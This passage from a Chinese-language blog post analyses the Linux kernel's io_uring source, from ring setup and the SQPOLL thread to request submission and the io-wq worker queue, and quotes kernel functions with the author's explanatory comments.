WRITE_ONCE(ctx-&gt;submitter_task, get_task_struct(current));file = io_uring_get_file(ctx);if (IS_ERR(file)) &#123; ret = PTR_ERR(file); goto err;&#125;ret = __io_uring_add_tctx_node(ctx);if (ret) goto err_fput;tctx = current-&gt;io_uring;/* * Install ring fd as the very last thing, so we don&#x27;t risk someone * having closed it before we finish setup */if (p-&gt;flags &amp; IORING_SETUP_REGISTERED_FD_ONLY) ret = io_ring_add_registered_file(tctx, file, 0, IO_RINGFD_REG_MAX);else ret = io_uring_install_fd(file);if (ret &lt; 0) goto err_fput; 错误处理如下： 123456err: io_ring_ctx_wait_and_kill(ctx); return ret;err_fput: fput(file); return ret; io_allocate_scq_urings 首先是rings的分配，核心关键点在于NO_MMAP 的处理 1234567891011121314151617181920212223242526static __cold int io_allocate_scq_urings(struct io_ring_ctx *ctx, struct io_uring_params *p)&#123; struct io_rings *rings; size_t size, sq_array_offset; void *ptr; /* make sure these are sane, as we already accounted them */ ctx-&gt;sq_entries = p-&gt;sq_entries; ctx-&gt;cq_entries = p-&gt;cq_entries; size = rings_size(ctx, p-&gt;sq_entries, p-&gt;cq_entries, &amp;sq_array_offset); if (size == SIZE_MAX) return -EOVERFLOW; if (!(ctx-&gt;flags &amp; IORING_SETUP_NO_MMAP)) rings = io_mem_alloc(size); // 如果没有设置NO_MMAP，就分配 else rings = io_rings_map(ctx, p-&gt;cq_off.user_addr, size); // 反之，建立映射 if (IS_ERR(rings)) return PTR_ERR(rings); ctx-&gt;rings = rings; 接下来是类似的，sqe的分配： 123456789101112131415161718192021222324252627if (!(ctx-&gt;flags &amp; IORING_SETUP_NO_SQARRAY)) ctx-&gt;sq_array = (u32 *)((char *)rings + sq_array_offset);rings-&gt;sq_ring_mask = p-&gt;sq_entries - 1;rings-&gt;cq_ring_mask = p-&gt;cq_entries - 1;rings-&gt;sq_ring_entries = p-&gt;sq_entries;rings-&gt;cq_ring_entries = p-&gt;cq_entries;if (p-&gt;flags &amp; IORING_SETUP_SQE128) size = array_size(2 * sizeof(struct io_uring_sqe), p-&gt;sq_entries);else size = array_size(sizeof(struct io_uring_sqe), p-&gt;sq_entries);if (size == SIZE_MAX) &#123; io_rings_free(ctx); return -EOVERFLOW;&#125;if (!(ctx-&gt;flags &amp; IORING_SETUP_NO_MMAP)) ptr = io_mem_alloc(size);else ptr = io_sqes_map(ctx, p-&gt;sq_off.user_addr, size);if (IS_ERR(ptr)) &#123; io_rings_free(ctx); return PTR_ERR(ptr);&#125;ctx-&gt;sq_sqes = ptr; io_sq_offload_create 如果设置了 SQPOLL， 用来创建内核收割任务的线程 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091__cold int io_sq_offload_create(struct io_ring_ctx *ctx, struct io_uring_params *p)&#123; int ret; /* Retain compatibility with failing for an invalid attach attempt */ if ((ctx-&gt;flags &amp; (IORING_SETUP_ATTACH_WQ | IORING_SETUP_SQPOLL)) == IORING_SETUP_ATTACH_WQ) &#123; struct fd f; f = fdget(p-&gt;wq_fd); if (!f.file) return -ENXIO; if (!io_is_uring_fops(f.file)) &#123; fdput(f); return -EINVAL; &#125; fdput(f); &#125; if (ctx-&gt;flags &amp; IORING_SETUP_SQPOLL) &#123; struct task_struct *tsk; struct io_sq_data *sqd; bool attached; ret = security_uring_sqpoll(); if (ret) return ret; sqd = io_get_sq_data(p, &amp;attached); // 获取一个sqd if (IS_ERR(sqd)) &#123; ret = PTR_ERR(sqd); goto err; &#125; ctx-&gt;sq_creds = get_current_cred(); ctx-&gt;sq_data = sqd; ctx-&gt;sq_thread_idle = msecs_to_jiffies(p-&gt;sq_thread_idle); if (!ctx-&gt;sq_thread_idle) ctx-&gt;sq_thread_idle = HZ; // 设置相关信息 io_sq_thread_park(sqd); list_add(&amp;ctx-&gt;sqd_list, &amp;sqd-&gt;ctx_list); io_sqd_update_thread_idle(sqd); /* don&#x27;t attach to a dying SQPOLL thread, would be racy */ ret = (attached &amp;&amp; !sqd-&gt;thread) ? -ENXIO : 0; io_sq_thread_unpark(sqd); if (ret &lt; 0) goto err; if (attached) return 0; if (p-&gt;flags &amp; IORING_SETUP_SQ_AFF) &#123; int cpu = p-&gt;sq_thread_cpu; ret = -EINVAL; if (cpu &gt;= nr_cpu_ids || !cpu_online(cpu)) goto err_sqpoll; sqd-&gt;sq_cpu = cpu; &#125; else &#123; sqd-&gt;sq_cpu = -1; &#125; sqd-&gt;task_pid = current-&gt;pid; sqd-&gt;task_tgid = current-&gt;tgid; tsk = create_io_thread(io_sq_thread, sqd, NUMA_NO_NODE); // 创建处理线程 if (IS_ERR(tsk)) &#123; ret = PTR_ERR(tsk); goto err_sqpoll; &#125; sqd-&gt;thread = tsk; ret = io_uring_alloc_task_context(tsk, ctx); wake_up_new_task(tsk); if (ret) goto err; &#125; else if (p-&gt;flags &amp; IORING_SETUP_SQ_AFF) &#123; /* Can&#x27;t have SQ_AFF without SQPOLL */ ret = -EINVAL; goto err; &#125; return 0;err_sqpoll: complete(&amp;ctx-&gt;sq_data-&gt;exited);err: io_sq_thread_finish(ctx); return ret;&#125; io_uring_enter 首先是对于flag的检查和确认，这里不一一赘述了，感兴趣的去看相应的man page更能了解 1234567891011121314151617181920212223242526272829303132333435363738394041SYSCALL_DEFINE6(io_uring_enter, unsigned int, fd, u32, to_submit, u32, min_complete, u32, flags, const void __user *, argp, size_t, argsz)&#123; struct io_ring_ctx *ctx; struct fd f; long ret; if (unlikely(flags &amp; ~(IORING_ENTER_GETEVENTS | IORING_ENTER_SQ_WAKEUP | IORING_ENTER_SQ_WAIT | IORING_ENTER_EXT_ARG | IORING_ENTER_REGISTERED_RING))) return -EINVAL; /* * Ring fd has been registered via IORING_REGISTER_RING_FDS, we * need only dereference our task private array to find it. */ if (flags &amp; IORING_ENTER_REGISTERED_RING) &#123; struct io_uring_task *tctx = current-&gt;io_uring; if (unlikely(!tctx || fd &gt;= IO_RINGFD_REG_MAX)) return -EINVAL; fd = array_index_nospec(fd, IO_RINGFD_REG_MAX); f.file = tctx-&gt;registered_rings[fd]; f.flags = 0; if (unlikely(!f.file)) return -EBADF; &#125; else &#123; f = fdget(fd); if (unlikely(!f.file)) return -EBADF; ret = -EOPNOTSUPP; if (unlikely(!io_is_uring_fops(f.file))) goto out; &#125; ctx = f.file-&gt;private_data; ret = -EBADFD; if (unlikely(ctx-&gt;flags &amp; IORING_SETUP_R_DISABLED)) goto out; SQPOLL模式下,直接返回提交数,可选择性wakeup线程 12345678910111213141516171819202122/* * For SQ polling, the thread will do all submissions and completions. * Just return the requested submit count, and wake the thread if * we were asked to. */ret = 0;if (ctx-&gt;flags &amp; IORING_SETUP_SQPOLL) &#123; io_cqring_overflow_flush(ctx); if (unlikely(ctx-&gt;sq_data-&gt;thread == NULL)) &#123; ret = -EOWNERDEAD; goto out; &#125; if (flags &amp; IORING_ENTER_SQ_WAKEUP) // 这个flag处于和用户态共享的内存 // 如果sq处理线程休眠了，并需要唤醒 // 可以通过设置 IORING_ENTER_SQ_WAKEUP， 再通过此syscall 来唤醒 wake_up(&amp;ctx-&gt;sq_data-&gt;wait); if (flags &amp; IORING_ENTER_SQ_WAIT) io_sqpoll_wait_sq(ctx); ret = to_submit; 非SQPOLL模式,执行提交请求到SQ环 1234567891011121314151617181920212223242526&#125; else if (to_submit) &#123; ret = io_uring_add_tctx_node(ctx); if (unlikely(ret)) goto out; mutex_lock(&amp;ctx-&gt;uring_lock); ret = io_submit_sqes(ctx, to_submit); // 直接提交 sqes // 这个函数将在后面分析 // SQPOLL 模式下创建的io_sq_thread 也会调用此函数 if (ret != to_submit) &#123; mutex_unlock(&amp;ctx-&gt;uring_lock); goto out; &#125; if (flags &amp; IORING_ENTER_GETEVENTS) &#123; if (ctx-&gt;syscall_iopoll) goto iopoll_locked; /* * Ignore errors, we&#x27;ll soon call io_cqring_wait() and * it should handle ownership problems if any. */ if (ctx-&gt;flags &amp; IORING_SETUP_DEFER_TASKRUN) (void)io_run_local_work_locked(ctx); &#125; mutex_unlock(&amp;ctx-&gt;uring_lock);&#125; 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647 if (flags &amp; IORING_ENTER_GETEVENTS) &#123; // 如果请求获取完成事件 int ret2; if (ctx-&gt;syscall_iopoll) &#123; // 如果开启了syscall轮询模式,执行iopoll逻辑 /* * We disallow the app entering submit/complete with * polling, but we still need to lock the ring to * prevent racing with polled issue that got punted to * a workqueue. */ mutex_lock(&amp;ctx-&gt;uring_lock);iopoll_locked: ret2 = io_validate_ext_arg(flags, argp, argsz); if (likely(!ret2)) &#123; min_complete = min(min_complete, ctx-&gt;cq_entries); ret2 = io_iopoll_check(ctx, min_complete); &#125; mutex_unlock(&amp;ctx-&gt;uring_lock); &#125; else &#123; const sigset_t __user *sig; struct __kernel_timespec __user *ts; ret2 = io_get_ext_arg(flags, argp, &amp;argsz, &amp;ts, &amp;sig); if (likely(!ret2)) &#123; min_complete = min(min_complete, ctx-&gt;cq_entries); ret2 = io_cqring_wait(ctx, min_complete, sig, argsz, ts); &#125; &#125; if (!ret) &#123; ret = ret2; /* * EBADR indicates that one or more CQE were dropped. * Once the user has been informed we can clear the bit * as they are obviously ok with those drops. */ if (unlikely(ret2 == -EBADR)) clear_bit(IO_CHECK_CQ_DROPPED_BIT, &amp;ctx-&gt;check_cq); &#125; &#125; 如果请求获取完成事件 如果开启了syscall轮询模式,执行iopoll逻辑 否则执行等待完成事件逻辑 kernel 最后是io_uring 内核的任务处理, 在这里先给出一个流程图, 然后再具体分析各个函数 图来自 https://zhuanlan.zhihu.com/p/380726590 , 侵删// io_sq_thread | 内核任务提交机制 io_sq_thread是 SQPOLL 模式下内核任务轮询线程. 首先设置线程环境 1234567891011121314151617181920static int io_sq_thread(void *data)&#123; struct io_sq_data *sqd = data; struct io_ring_ctx *ctx; unsigned long timeout = 0; char buf[TASK_COMM_LEN]; DEFINE_WAIT(wait); snprintf(buf, sizeof(buf), &quot;iou-sqp-%d&quot;, sqd-&gt;task_pid); set_task_comm(current, buf); /* reset to our pid after we&#x27;ve set task_comm, for fdinfo */ sqd-&gt;task_pid = current-&gt;pid; if (sqd-&gt;sq_cpu != -1) &#123; set_cpus_allowed_ptr(current, cpumask_of(sqd-&gt;sq_cpu)); &#125; else &#123; set_cpus_allowed_ptr(current, cpu_online_mask); sqd-&gt;sq_cpu = raw_smp_processor_id(); &#125; 接下来获取锁并进入无限循环 12mutex_lock(&amp;sqd-&gt;lock);while (1) &#123; 设置好timeout 123456if (io_sqd_events_pending(sqd) || signal_pending(current)) &#123; if (io_sqd_handle_event(sqd)) break; timeout = jiffies + sqd-&gt;sq_thread_idle; // sq_thread_idle 来自用户在 params 设置的时间&#125; 注意到这个线程创建在内存分配好之后， 即，即使是第一次进入此线程， 如果 sqes对应内存有任务，也会处理任务， 意味着在 io_uring_setup 之前，在sqes写好的任务，也可以被处理 1234567891011121314151617181920212223242526272829cap_entries = !list_is_singular(&amp;sqd-&gt;ctx_list);// 获取是否有多个io_ring的标记cap_entrieslist_for_each_entry(ctx, &amp;sqd-&gt;ctx_list, sqd_list) &#123;// 遍历注册的io_ring,调用__io_sq_thread做实际的轮询操作 int ret = __io_sq_thread(ctx, cap_entries); if (!sqt_spin &amp;&amp; (ret &gt; 0 || !wq_list_empty(&amp;ctx-&gt;iopoll_list))) sqt_spin = true; // 如果有事件处理或iopoll任务,则设置sqt_spin标记&#125;if (io_run_task_work())// 调用io_run_task_work处理排队的工作任务 sqt_spin = true;if (sqt_spin || !time_after(jiffies, timeout)) &#123;// 如果有待处理事件或时间没超时 if (sqt_spin) timeout = jiffies + sqd-&gt;sq_thread_idle; // 如果有待处理事件,更新下一次超时时间 if (unlikely(need_resched())) &#123; // 检查是否需要调度,如果需要,主动释放并重新获取锁 mutex_unlock(&amp;sqd-&gt;lock); cond_resched(); mutex_lock(&amp;sqd-&gt;lock); sqd-&gt;sq_cpu = raw_smp_processor_id(); &#125; continue; // 没超时就直接continue， 因为之后就是判断是否需要阻塞&#125; 接下来实现io_uring SQ线程的阻塞和唤醒逻辑 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748 prepare_to_wait(&amp;sqd-&gt;wait, &amp;wait, TASK_INTERRUPTIBLE); // 将当前线程设置为可中断状态TASK_INTERRUPTIBLE if (!io_sqd_events_pending(sqd) &amp;&amp; !task_work_pending(current)) &#123; bool needs_sched = true; // 检查是否有待处理事件和任务 list_for_each_entry(ctx, &amp;sqd-&gt;ctx_list, sqd_list) &#123; // 若没有则遍历所有注册的io_ring atomic_or(IORING_SQ_NEED_WAKEUP, &amp;ctx-&gt;rings-&gt;sq_flags); // 设置IORING_SQ_NEED_WAKEUP标志 if ((ctx-&gt;flags &amp; IORING_SETUP_IOPOLL) &amp;&amp; !wq_list_empty(&amp;ctx-&gt;iopoll_list)) &#123; // 检查iopoll和SQ队列是否为空 needs_sched = false; break; &#125; /* * Ensure the store of the wakeup flag is not * reordered with the load of the SQ tail */ smp_mb__after_atomic(); if (io_sqring_entries(ctx)) &#123; needs_sched = false; break; &#125; &#125; if (needs_sched) &#123; // 如果需要调度 mutex_unlock(&amp;sqd-&gt;lock); // 释放锁调度 schedule(); mutex_lock(&amp;sqd-&gt;lock); // 唤醒后重新获取锁和CPU信息 sqd-&gt;sq_cpu = raw_smp_processor_id(); &#125; list_for_each_entry(ctx, &amp;sqd-&gt;ctx_list, sqd_list) atomic_andnot(IORING_SQ_NEED_WAKEUP, &amp;ctx-&gt;rings-&gt;sq_flags); // 否则清除唤醒标记 &#125; finish_wait(&amp;sqd-&gt;wait, &amp;wait); timeout = jiffies + sqd-&gt;sq_thread_idle; // 更新等待时间&#125; 最后是退出无限循环时的清理机制 123456789io_uring_cancel_generic(true, sqd);sqd-&gt;thread = NULL;list_for_each_entry(ctx, &amp;sqd-&gt;ctx_list, sqd_list) atomic_or(IORING_SQ_NEED_WAKEUP, &amp;ctx-&gt;rings-&gt;sq_flags);io_run_task_work();mutex_unlock(&amp;sqd-&gt;lock);complete(&amp;sqd-&gt;exited);do_exit(0); __io_sq_thread 12345678910111213141516171819202122232425262728293031323334353637383940414243static int __io_sq_thread(struct io_ring_ctx *ctx, bool cap_entries)&#123; unsigned int to_submit; int ret = 0; to_submit = io_sqring_entries(ctx); /* if we&#x27;re handling multiple rings, cap submit size for fairness */ if (cap_entries &amp;&amp; to_submit &gt; IORING_SQPOLL_CAP_ENTRIES_VALUE) to_submit = IORING_SQPOLL_CAP_ENTRIES_VALUE; // 计算需要提交的任务数量 // 如果需要公平,则 cap 为固定最大值 if (!wq_list_empty(&amp;ctx-&gt;iopoll_list) || to_submit) &#123; // 如果有 iopoll 任务或可提交请求 const struct cred *creds = NULL; if (ctx-&gt;sq_creds != current_cred()) creds = override_creds(ctx-&gt;sq_creds); // 保存和恢复 creds 身份信息避免安全漏洞 mutex_lock(&amp;ctx-&gt;uring_lock); // 上锁保护关键区 if (!wq_list_empty(&amp;ctx-&gt;iopoll_list)) io_do_iopoll(ctx, true); // 处理 iopoll 轮询事件 /* * Don&#x27;t submit if refs are dying, good for io_uring_register(), * but also it is relied upon by io_ring_exit_work() */ if (to_submit &amp;&amp; likely(!percpu_ref_is_dying(&amp;ctx-&gt;refs)) &amp;&amp; !(ctx-&gt;flags &amp; IORING_SETUP_R_DISABLED)) ret = io_submit_sqes(ctx, to_submit); // 提交请求到 SQ 环 mutex_unlock(&amp;ctx-&gt;uring_lock); if (to_submit &amp;&amp; wq_has_sleeper(&amp;ctx-&gt;sqo_sq_wait)) wake_up(&amp;ctx-&gt;sqo_sq_wait); // 唤醒 sqo_sq 等待线程 if (creds) revert_creds(creds); &#125; return ret;&#125; 其中 io_sqring_entries 逻辑如下 所以内核在SQPOLL 模式下判断是否有任务需要执行，就是看 tail 是否更新 123456789static inline unsigned int io_sqring_entries(struct io_ring_ctx *ctx)&#123; struct io_rings *rings = ctx-&gt;rings; unsigned int entries; /* make sure SQ entry isn&#x27;t read before tail */ entries = smp_load_acquire(&amp;rings-&gt;sq.tail) - ctx-&gt;cached_sq_head; return min(entries, ctx-&gt;sq_entries);&#125; io_submit_sqes 最后是真正的提交请求函数 计算需要提交的sqes并跟踪状态 12345678910111213int io_submit_sqes(struct io_ring_ctx *ctx, unsigned int nr) __must_hold(&amp;ctx-&gt;uring_lock)&#123; unsigned int entries = io_sqring_entries(ctx); unsigned int left; int ret; if (unlikely(!entries)) return 0; /* make sure SQ entry isn&#x27;t read before tail */ ret = left = min(nr, entries); io_get_task_refs(left); io_submit_state_start(&amp;ctx-&gt;submit_state, left); 循环处理每个sqes 123456789101112131415161718do &#123; const struct io_uring_sqe *sqe; struct io_kiocb *req; if (unlikely(!io_alloc_req(ctx, &amp;req))) break; if (unlikely(!io_get_sqe(ctx, &amp;sqe))) &#123; io_req_add_to_cache(req, ctx); break; &#125; // 为每个SQE分配并初始化io_kiocb请求 if (unlikely(io_submit_sqe(ctx, req, sqe)) &amp;&amp; // 真正的提交 !(ctx-&gt;flags &amp; IORING_SETUP_SUBMIT_ALL)) &#123; left--; break; &#125;&#125; while (--left); io_submit_sqe 这个函数比较关键的是对于同步的处理, 我们知道, io_uring 是异步的, 任务处理的顺序不一定是按照提交的顺序, 但是, 如果 sqe 的 flag字段设置了 IOSQE_IO_LINK , 那么任务就会挂在一条链上, 直到一个任务没有此flag, 而链上的任务的执行是有先后顺序 同时, 要理解, ctx-&gt;sumit_state.link 是一个循环链表, 由 io_kiocb 组成, 每个 io_kiocb 的link成员指向下一个 io_kiocb 结构 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960static inline int io_submit_sqe(struct io_ring_ctx *ctx, struct io_kiocb *req, const struct io_uring_sqe *sqe) __must_hold(&amp;ctx-&gt;uring_lock)&#123; struct io_submit_link *link = &amp;ctx-&gt;submit_state.link; int ret; ret = io_init_req(ctx, req, sqe); // 初始化并校验SQE请求req if (unlikely(ret)) return io_submit_fail_init(sqe, req, ret); // 如果已有链头或者SQE标记了链接标志 trace_io_uring_submit_req(req); /* * If we already have a head request, queue this one for async * submittal once the head completes. If we don&#x27;t have a head but * IOSQE_IO_LINK is set in the sqe, start a new head. This one will be * submitted sync once the chain is complete. If none of those * conditions are true (normal request), then just queue it. */ if (unlikely(link-&gt;head)) &#123; // 如果链表已经有了一个head 请求, 意味着之前sqe 有 `IOSQE_IO_LINK` 标志 ret = io_req_prep_async(req); // 准备异步提交状态 if (unlikely(ret)) return io_submit_fail_init(sqe, req, ret); trace_io_uring_link(req, link-&gt;head); link-&gt;last-&gt;link = req; link-&gt;last = req; // 将本项挂载到链表 if (req-&gt;flags &amp; IO_REQ_LINK_FLAGS) return 0; // 如果此项没有 LINK 标志, 清空 链表 /* last request of the link, flush it */ req = link-&gt;head; link-&gt;head = NULL; if (req-&gt;flags &amp; (REQ_F_FORCE_ASYNC | REQ_F_FAIL)) goto fallback; &#125; else if (unlikely(req-&gt;flags &amp; (IO_REQ_LINK_FLAGS | REQ_F_FORCE_ASYNC | REQ_F_FAIL))) &#123; // 如果之前的任务没有LINK 标记, 但此任务有, 给链表添加一个头 if (req-&gt;flags &amp; IO_REQ_LINK_FLAGS) &#123; link-&gt;head = req; link-&gt;last = req; &#125; else &#123;fallback: // 加入降级提交fallback队列 io_queue_sqe_fallback(req); &#125; return 0; &#125; // 加入普通提交队列 io_queue_sqe(req); return 0;&#125; io_queue_sqe | io_issue_sqe | 重要 12345678910111213141516static inline void io_queue_sqe(struct io_kiocb *req) __must_hold(&amp;req-&gt;ctx-&gt;uring_lock)&#123; int ret; ret = io_issue_sqe(req, IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER); /* * We async punt it if the file wasn&#x27;t marked NOWAIT, or if the file * doesn&#x27;t support non-blocking read/write attempts */ if (likely(!ret)) io_arm_ltimeout(req); else io_queue_async(req, ret);&#125; 12345678910111213141516171819202122232425262728293031323334353637383940414243static int io_issue_sqe(struct io_kiocb *req, unsigned int issue_flags)&#123; const struct io_issue_def *def = &amp;io_issue_defs[req-&gt;opcode]; // 根据op_code 查看请求def const struct cred *creds = NULL; int ret; if (unlikely(!io_assign_file(req, def, issue_flags))) return -EBADF; // 为请求分配文件描述符 if (unlikely((req-&gt;flags &amp; REQ_F_CREDS) &amp;&amp; req-&gt;creds != current_cred())) creds = override_creds(req-&gt;creds); // 备份和恢复请求执行线程的安全凭证 if (!def-&gt;audit_skip) audit_uring_entry(req-&gt;opcode); // 调用audit跟踪提交事件 ret = def-&gt;issue(req, issue_flags); // 调用def-&gt;issue执行请求 if (!def-&gt;audit_skip) audit_uring_exit(!ret, ret); if (creds) revert_creds(creds); // 恢复凭证 if (ret == IOU_OK) &#123; if (issue_flags &amp; IO_URING_F_COMPLETE_DEFER) // 如果成功并且标记了延迟完成,注册延迟完成回调 io_req_complete_defer(req); else io_req_complete_post(req, issue_flags); // 否则直接提交完成 &#125; else if (ret != IOU_ISSUE_SKIP_COMPLETE) return ret; /* If the op doesn&#x27;t have a file, we&#x27;re not polling for it */ if ((req-&gt;ctx-&gt;flags &amp; IORING_SETUP_IOPOLL) &amp;&amp; def-&gt;iopoll_queue) io_iopoll_req_issued(req, issue_flags); return 0;&#125; io_get_sqe | 重要 12345678910111213141516171819202122232425static bool io_get_sqe(struct io_ring_ctx *ctx, const struct io_uring_sqe **sqe)&#123; unsigned mask = ctx-&gt;sq_entries - 1; unsigned head = ctx-&gt;cached_sq_head++ &amp; mask; if (!(ctx-&gt;flags &amp; IORING_SETUP_NO_SQARRAY)) &#123; head = READ_ONCE(ctx-&gt;sq_array[head]); // 如果没有设置NOSQARRAY 直接从array读 if (unlikely(head &gt;= ctx-&gt;sq_entries)) &#123; // 丢弃无效 entries spin_lock(&amp;ctx-&gt;completion_lock); ctx-&gt;cq_extra--; spin_unlock(&amp;ctx-&gt;completion_lock); WRITE_ONCE(ctx-&gt;rings-&gt;sq_dropped, READ_ONCE(ctx-&gt;rings-&gt;sq_dropped) + 1); return false; &#125; &#125; if (ctx-&gt;flags &amp; IORING_SETUP_SQE128) head &lt;&lt;= 1; *sqe = &amp;ctx-&gt;sq_sqes[head]; // 从 sq_sqes 取一个sqe return true;&#125; io_submit_sqe | 同步与异步的请求执行 我们首先回到 io_submit_sqe 我们注意到, 如果存在 LINK 标记, 只是将这个req添加到链上, 而没有 io_queue_sqe. 如果前一个请求有 LINK 标记, 此时没有, 也只是将请求加入链中后, 清空 head. 此时调用的是 io_queue_sqe(NULL) 综上, 对于link, 并没有直接处理. 12345678910111213141516171819202122232425262728293031323334353637 if (unlikely(link-&gt;head)) &#123; // 如果链表已经有了一个head 请求, 意味着之前sqe 有 `IOSQE_IO_LINK` 标志 ret = io_req_prep_async(req); // 准备异步提交状态 if (unlikely(ret)) return io_submit_fail_init(sqe, req, ret); trace_io_uring_link(req, link-&gt;head); link-&gt;last-&gt;link = req; link-&gt;last = req; // 将本项挂载到链表 if (req-&gt;flags &amp; IO_REQ_LINK_FLAGS) return 0; // 如果此项没有 LINK 标志, 清空 链表 /* last request of the link, flush it */ req = link-&gt;head; link-&gt;head = NULL; if (req-&gt;flags &amp; (REQ_F_FORCE_ASYNC | REQ_F_FAIL)) goto fallback; &#125; else if (unlikely(req-&gt;flags &amp; (IO_REQ_LINK_FLAGS | REQ_F_FORCE_ASYNC | REQ_F_FAIL))) &#123; // 如果之前的任务没有LINK 标记, 但此任务有, 给链表添加一个头 if (req-&gt;flags &amp; IO_REQ_LINK_FLAGS) &#123; link-&gt;head = req; link-&gt;last = req; &#125; else &#123;fallback: // 加入降级提交fallback队列 io_queue_sqe_fallback(req); &#125; return 0; &#125; // 加入普通提交队列 io_queue_sqe(req); 再次重回 io_queue_sqe 函数, 我们发现其在调用 io_issue_sqe 时设置了这样两个标志 IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER, 字面意义上理解, 就是非阻塞与延迟完成. 首先为什么要非阻塞呢? 让我们往前回想, 发现, 在 IOPOLL 模式下, io_uring_enter 也是调用了 io_submit_sqes , 最终也会调用到此函数, 所以如果这个函数阻塞了, IOPOLL模式下, 用户进程实际上也是阻塞的, 也就不符合异步的初衷了 12345678910111213141516static inline void io_queue_sqe(struct io_kiocb *req) __must_hold(&amp;req-&gt;ctx-&gt;uring_lock)&#123; int ret; ret = io_issue_sqe(req, IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER); /* * We async punt it if the file wasn&#x27;t marked NOWAIT, or if the file * doesn&#x27;t support non-blocking read/write attempts */ if (likely(!ret)) io_arm_ltimeout(req); else io_queue_async(req, ret);&#125; 接下来再进入 io_issue_sqe , 其中使用了一个虚表调用处理函数, 并且之前的flag也作为参数传入了. 而我们知道, 如read, write等很多操作, 都是阻塞的, 不能 NOBLOCK , 因此, 这个执行只是一个尝试执行, 实际上并没有真正完成请求 12ret = def-&gt;issue(req, issue_flags);// 调用def-&gt;issue执行请求 接下来我们注意到, 在 io_queue_sqe 调用此函数时, 设置了 IO_URING_F_COMPLETE_DEFER 标志 123456789if (ret == IOU_OK) &#123; if (issue_flags &amp; IO_URING_F_COMPLETE_DEFER) // 如果成功并且标记了延迟完成,注册延迟完成回调 io_req_complete_defer(req); else io_req_complete_post(req, issue_flags); // 否则直接提交完成 &#125; else if (ret != IOU_ISSUE_SKIP_COMPLETE) return ret; 继续进入 io_req_complete_defer 发现实际上就是将请求插入插入链表 123456789static inline void io_req_complete_defer(struct io_kiocb *req) __must_hold(&amp;req-&gt;ctx-&gt;uring_lock)&#123; struct io_submit_state *state = &amp;req-&gt;ctx-&gt;submit_state; lockdep_assert_held(&amp;req-&gt;ctx-&gt;uring_lock); wq_list_add_tail(&amp;req-&gt;comp_list, &amp;state-&gt;compl_reqs);&#125; 这也没有完成请求. 那么真正完成请求是在哪? 让我们继续分析 io_queue_async 在 io_issue_sqe 返回后, io_queue_sqe 继续调用了此函数 1234567891011121314151617181920212223242526272829303132static void io_queue_async(struct io_kiocb *req, int ret) __must_hold(&amp;req-&gt;ctx-&gt;uring_lock)&#123; struct io_kiocb *linked_timeout; if (ret != -EAGAIN || (req-&gt;flags &amp; REQ_F_NOWAIT)) &#123; io_req_defer_failed(req, ret); return; &#125;// 如果请求是不可等待的必须立马完成的, 就不能推迟 linked_timeout = io_prep_linked_timeout(req); switch (io_arm_poll_handler(req, 0)) &#123; // 这里调用了一个 论询问 handler, 确定 请求的类型 case IO_APOLL_READY: // 如果已经可以完成了 io_kbuf_recycle(req, 0); io_req_task_queue(req); break; case IO_APOLL_ABORTED: // 如果终止了 io_kbuf_recycle(req, 0); io_queue_iowq(req, NULL); break; case IO_APOLL_OK: // 如果已经完成了 break; &#125; if (linked_timeout) io_queue_linked_timeout(linked_timeout);&#125; 主要到, 当为 IO_APOLL_ABORTED 时, 调用了 io_queue_iowq 这里先介绍一下 kernel work queue 机制, workqueue 是一个内核线程池, 当有任务来时, 就从线程池中寻找一个线程运行, 这里就是将请求放入线程池的队列中 这里可能会有读者有疑问, 那线程池是什么时候创建的呢? 其实是在被笔者跳过的 ctx 的创建过程中// #TODO 由于过于繁杂, 笔者暂时没有分析 io_queue_iowq | 任务处理线程池 这一部分也比较重要, 首先是 io_prep_async_link(req) , 为在一条链上的请求创建 work 结构, 用来放入队列中, 并且 通过 io_wq_enqueue 将其加入线程池队列 1234567891011121314151617181920212223242526void io_queue_iowq(struct io_kiocb *req, struct io_tw_state *ts_dont_use)&#123; struct io_kiocb *link = io_prep_linked_timeout(req); struct io_uring_task *tctx = req-&gt;task-&gt;io_uring; BUG_ON(!tctx); BUG_ON(!tctx-&gt;io_wq); /* init -&gt;work of the whole link before punting */ io_prep_async_link(req); // 为链少的每一个 req 准备work结构 /* * Not expected to happen, but if we do have a bug where this _can_ * happen, catch it here and ensure the request is marked as * canceled. That will make io-wq go through the usual work cancel * procedure rather than attempt to run this request (or create a new * worker for it). */ if (WARN_ON_ONCE(!same_thread_group(req-&gt;task, current))) req-&gt;work.flags |= IO_WQ_WORK_CANCEL; trace_io_uring_queue_async_work(req, io_wq_is_hashed(&amp;req-&gt;work)); io_wq_enqueue(tctx-&gt;io_wq, &amp;req-&gt;work); if (link) io_queue_linked_timeout(link);&#125; 为什么要用work结构而不是 io_kiocb 结构呢, work结构是 io_kiocb 的一个成员, 通过指针减去偏移就可以得到 io_kiocb 的指针, 与此通过, 由于work结构更小, 创建临时结构体时占用空间更小 io_wq_enqueue io_wq_enqueue 是将任务加入 io_wq 线程池的任务队列中. 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950void io_wq_enqueue(struct io_wq *wq, struct io_wq_work *work)&#123; struct io_wq_acct *acct = io_work_get_acct(wq, work); struct io_cb_cancel_data match; unsigned work_flags = work-&gt;flags; bool do_create; /* * If io-wq is exiting for this task, or if the request has explicitly * been marked as one that should not get executed, cancel it here. */ if (test_bit(IO_WQ_BIT_EXIT, &amp;wq-&gt;state) || (work-&gt;flags &amp; IO_WQ_WORK_CANCEL)) &#123; io_run_cancel(work, wq); return; &#125; // 如果需要取消 work raw_spin_lock(&amp;acct-&gt;lock); io_wq_insert_work(wq, work); clear_bit(IO_ACCT_STALLED_BIT, &amp;acct-&gt;flags); raw_spin_unlock(&amp;acct-&gt;lock); rcu_read_lock(); do_create = !io_wq_activate_free_worker(wq, acct); rcu_read_unlock(); // 是否需要创建worker if (do_create &amp;&amp; ((work_flags &amp; IO_WQ_WORK_CONCURRENT) || !atomic_read(&amp;acct-&gt;nr_running))) &#123; bool did_create; did_create = io_wq_create_worker(wq, acct); // 创建worker if (likely(did_create)) return; // 如果已经创建了, 直接返回 raw_spin_lock(&amp;wq-&gt;lock); if (acct-&gt;nr_workers) &#123; 